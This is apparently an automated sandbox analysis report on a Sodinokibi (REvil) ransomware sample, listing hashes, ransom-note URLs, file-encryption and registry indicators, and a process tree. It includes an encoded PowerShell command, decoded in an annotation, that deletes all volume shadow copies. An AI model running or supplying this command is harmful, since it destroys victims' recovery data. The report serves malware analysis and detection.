Analysis
- max time kernel: 143s
- max time network: 148s
- platform: windows10_x64
- resource: win10v200722
- submitted: 20-08-2020 13:04

Static task: static1

Behavioral task: behavioral1
- Sample: f97175fdad804a02e6f24273b371184d816044eb2409dadaad683c07fd41e992.bin.exe.dll
- Resource: win7

Behavioral task: behavioral2
- Sample: f97175fdad804a02e6f24273b371184d816044eb2409dadaad683c07fd41e992.bin.exe.dll
- Resource: win10v200722
General
- Target: f97175fdad804a02e6f24273b371184d816044eb2409dadaad683c07fd41e992.bin.exe.dll
- Size: 116KB
- MD5: 53fd5fc16a31ab15167c9a804e3c7c14
- SHA1: 88b14c8f851f04c9d595ff3ae441bcf52489df08
- SHA256: f97175fdad804a02e6f24273b371184d816044eb2409dadaad683c07fd41e992
- SHA512: 085c5f4a8ec87c5b714cd8b4016170aa97ef80b2ec70a175f10e3a7e6c83b76aa30bcf76923cc2621fba42ee7015e452814b7d0f42f3de2146c2284a0145d3c0
Malware Config
- Extracted from: C:\r69548y0-readme.txt
- Family: sodinokibi
- URLs:
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A66F0878FB3BF952
  - http://decryptor.cc/A66F0878FB3BF952
Signatures
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Blacklisted process makes network request (94 IoCs)
  Processes: rundll32.exe
- Modifies extensions of user files (5 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: rundll32.exe
  - File renamed: C:\Users\Admin\Pictures\ConnectDebug.crw => \??\c:\users\admin\pictures\ConnectDebug.crw.r69548y0 (rundll32.exe)
  - File renamed: C:\Users\Admin\Pictures\SetMerge.tiff => \??\c:\users\admin\pictures\SetMerge.tiff.r69548y0 (rundll32.exe)
  - File renamed: C:\Users\Admin\Pictures\UnregisterOpen.crw => \??\c:\users\admin\pictures\UnregisterOpen.crw.r69548y0 (rundll32.exe)
  - File renamed: C:\Users\Admin\Pictures\WriteConfirm.raw => \??\c:\users\admin\pictures\WriteConfirm.raw.r69548y0 (rundll32.exe)
  - File opened for modification: \??\c:\users\admin\pictures\SetMerge.tiff (rundll32.exe)
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 5 IoCs)
  Processes: vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} (vssvc.exe)
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: rundll32.exe
  - Set value (str): \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9d29gzf42127.bmp" (rundll32.exe)
- Drops file in Program Files directory (28 IoCs)
  Processes: rundll32.exe
  - File created: \??\c:\program files (x86)\r69548y0-readme.txt (rundll32.exe)
  - File opened for modification: \??\c:\program files\CloseRead.raw (rundll32.exe)
  - File opened for modification: \??\c:\program files\DenyTest.css (rundll32.exe)
  - File opened for modification: \??\c:\program files\ExitUnprotect.au (rundll32.exe)
  - File opened for modification: \??\c:\program files\SelectConnect.M2V (rundll32.exe)
  - File opened for modification: \??\c:\program files\AddReceive.pot (rundll32.exe)
  - File opened for modification: \??\c:\program files\ExportUpdate.wvx (rundll32.exe)
  - File opened for modification: \??\c:\program files\RestoreResize.htm (rundll32.exe)
  - File opened for modification: \??\c:\program files\SelectPublish.bmp (rundll32.exe)
  - File opened for modification: \??\c:\program files\SuspendUninstall.pcx (rundll32.exe)
  - File opened for modification: \??\c:\program files\ConnectRemove.temp (rundll32.exe)
  - File opened for modification: \??\c:\program files\FormatExport.ppsx (rundll32.exe)
  - File opened for modification: \??\c:\program files\PushGrant.bmp (rundll32.exe)
  - File opened for modification: \??\c:\program files\ShowStart.vb (rundll32.exe)
  - File opened for modification: \??\c:\program files\ConvertFromLock.wvx (rundll32.exe)
  - File opened for modification: \??\c:\program files\ExpandExport.shtml (rundll32.exe)
  - File opened for modification: \??\c:\program files\ReceiveMount.dwfx (rundll32.exe)
  - File opened for modification: \??\c:\program files\RepairConnect.jpe (rundll32.exe)
  - File opened for modification: \??\c:\program files\ResetDismount.rmi (rundll32.exe)
  - File opened for modification: \??\c:\program files\ResumeSync.dwfx (rundll32.exe)
  - File opened for modification: \??\c:\program files\SearchResize.m4a (rundll32.exe)
  - File opened for modification: \??\c:\program files\ConvertStep.jpeg (rundll32.exe)
  - File opened for modification: \??\c:\program files\InvokeWait.vbe (rundll32.exe)
  - File opened for modification: \??\c:\program files\NewUse.aif (rundll32.exe)
  - File opened for modification: \??\c:\program files\SendLimit.ttf (rundll32.exe)
  - File created: \??\c:\program files\r69548y0-readme.txt (rundll32.exe)
  - File opened for modification: \??\c:\program files\SendSuspend.vsdx (rundll32.exe)
  - File opened for modification: \??\c:\program files\ResizeSelect.svgz (rundll32.exe)
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: rundll32.exe, powershell.exe
  - PID 2716 rundll32.exe
  - PID 2716 rundll32.exe
  - PID 3268 powershell.exe
  - PID 3268 powershell.exe
  - PID 3268 powershell.exe
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Processes: rundll32.exe, powershell.exe, vssvc.exe
  - Token: SeDebugPrivilege, PID 2716 rundll32.exe
  - Token: SeDebugPrivilege, PID 3268 powershell.exe
  - Token: SeBackupPrivilege, PID 1852 vssvc.exe
  - Token: SeRestorePrivilege, PID 1852 vssvc.exe
  - Token: SeAuditPrivilege, PID 1852 vssvc.exe
  - Token: SeTakeOwnershipPrivilege, PID 2716 rundll32.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: rundll32.exe, rundll32.exe
  - PID 3980 (rundll32.exe) wrote to memory of PID 2716 (rundll32.exe)
  - PID 3980 (rundll32.exe) wrote to memory of PID 2716 (rundll32.exe)
  - PID 3980 (rundll32.exe) wrote to memory of PID 2716 (rundll32.exe)
  - PID 2716 (rundll32.exe) wrote to memory of PID 3268 (powershell.exe)
  - PID 2716 (rundll32.exe) wrote to memory of PID 3268 (powershell.exe)
Processes
- C:\Windows\system32\rundll32.exe (PID 3980)
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\f97175fdad804a02e6f24273b371184d816044eb2409dadaad683c07fd41e992.bin.exe.dll,#1
  Signatures:
  - Suspicious use of WriteProcessMemory
  Child processes:
  - C:\Windows\SysWOW64\rundll32.exe (PID 2716)
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\f97175fdad804a02e6f24273b371184d816044eb2409dadaad683c07fd41e992.bin.exe.dll,#1
    Signatures:
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    Child processes:
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3268)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Note: the -e argument is base64-encoded UTF-16LE and decodes to `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, which deletes every volume shadow copy via WMI; the vssvc.exe and unsecapp.exe (WMI callback host) entries below are consistent with that call, and an encoded PowerShell command spawned by rundll32.exe is a useful detection point on its own.
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\unsecapp.exe (PID 644)
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\vssvc.exe (PID 1852)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken